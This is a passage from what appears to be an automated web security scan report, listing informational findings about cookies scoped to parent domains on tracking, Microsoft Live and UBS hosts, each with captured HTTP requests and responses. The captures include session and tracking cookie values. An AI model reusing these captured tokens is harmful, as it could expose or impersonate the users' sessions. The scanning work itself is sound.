Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EE0ACvaeApllAacBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0dpKRrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/7111//82F1/
Set-Cookie: d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: QS


9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-5eu58oSpL1cEs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-5eu58oSpL1cEs.gif?labels=_fp.channel.Beauty+of+the+Web,_fp.event.All+Content HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EO8AFPaeApll_6ixz4EBrAEBlAeB1Q4eqT0eThocKRkoxJavgQCIEACWCmAObyviDOFdHhDRDhDRmS5bkrFrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q; expires=Tue, 04-Oct-2011 15:39:02 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Wed, 06 Jul 2011 15:39:02 GMT
Server: QS

GIF89a.......,.................D..;

9.32. http://profile.live.com/badge/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft+News+Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png HTTP/1.1
Host: profile.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; sc_clustbl_142=6725091ecd4325b02:nK2egy9F4YAy3X0iJIsk4gWz/TnLERdzTYsLBI8gS4dY1I1zZH7VdzxoWPietMFwJ+QtJqQopIgEEkfF8AtEkdCRD5CVTskP/DRQUugWImwwVCCEmH0dJyGBA/G61wU3f520yqTm46/CX4/Eyo6aSA==; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950981&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1
Server: Microsoft-IIS/7.5
X-Imf: 8b22b2cd-4263-44ba-aaeb-e42b091bf16a
Set-Cookie: E=P:bOIwReUJzog=:+1yDfpFa5Q6cY2Ra7+2GtI6CZeM5y7anIF6uyN3OFUc=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: SABadge=msg=&url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft%20News%20Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png&ctype=link&swfurl=&height=&width=&emv=; expires=Thu, 07-Jul-2011 11:16:21 GMT; path=/Badge/
Set-Cookie: sc_clustbl_142=d751af858b13d51f; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC667 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Content-Length: 314

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1309950981&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

9.33. https://quotes-public.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public.ubs.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/home HTTP/1.1
Host: quotes-public1.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com; Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:52:26 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:06:32 GMT; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/legChooseDomicile
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/de

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/de HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:51 GMT
Server: Apache
Set-Cookie: ubslang=de-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=wwy/bl/536LcaMPi7GA/Za5JB+9u0vIfbxz1PWDLCjlHhr4eOK5kCvNkSrvKkTm5roTeIgMCGhY-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/en

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/en HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:53 GMT
Server: Apache
Set-Cookie: ubslang=en-US; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=6G2OGI4Mofoqm3Bjc1IRFE50rP8F7k2B0jFsSxftOEdoQcPDAFecRqYUR7Aq9MgK2AOPyJpTcGA-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/fr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/fr HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=fr-CH; Domain=.ubs.com; Max-Age=2147483646; Expires=Mon, 24 Jul 2079 17:21:58 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=Wyg33L33zBKvKRR1J07MC3T0k3Ho/EjMtEtx3rdubNAr32qz8nf8xwGoImu5je3zV/T53mEjDdg-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public1.ubs.com
Path:   /app/CGT/Workbench/wb/lang/it

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/CGT/Workbench/wb/lang/it HTTP/1.1
Host: quotes-public1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:52 GMT
Server: Apache
Set-Cookie: ubslang=it-CH; Domain=.ubs.com; Max-Age=2147483647; Expires=Mon, 24 Jul 2079 17:21:59 GMT; Path=/; Secure; Version=1
Set-Cookie: Navajo=tyKPlvE7DsLkcB09TcOGFUhMhpU2+qTbpNwNpzilJDEKEJ4haF5DeoAANdBD35geyk8nTgKuvAI-; Path=/; Secure; Version=1
Content-Type: text/plain
Content-Language: en-US
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 0
Location: https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close


9.39. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=dLIuOGfOzkZylUaPcW45J1NM3fA_ZnR2d4cPbuMElFEvYxI1ZImxMCpPyY8hh_IBrR-1pVaDIemsGHXtH-_-EA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo
2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; 
fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xa
xbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0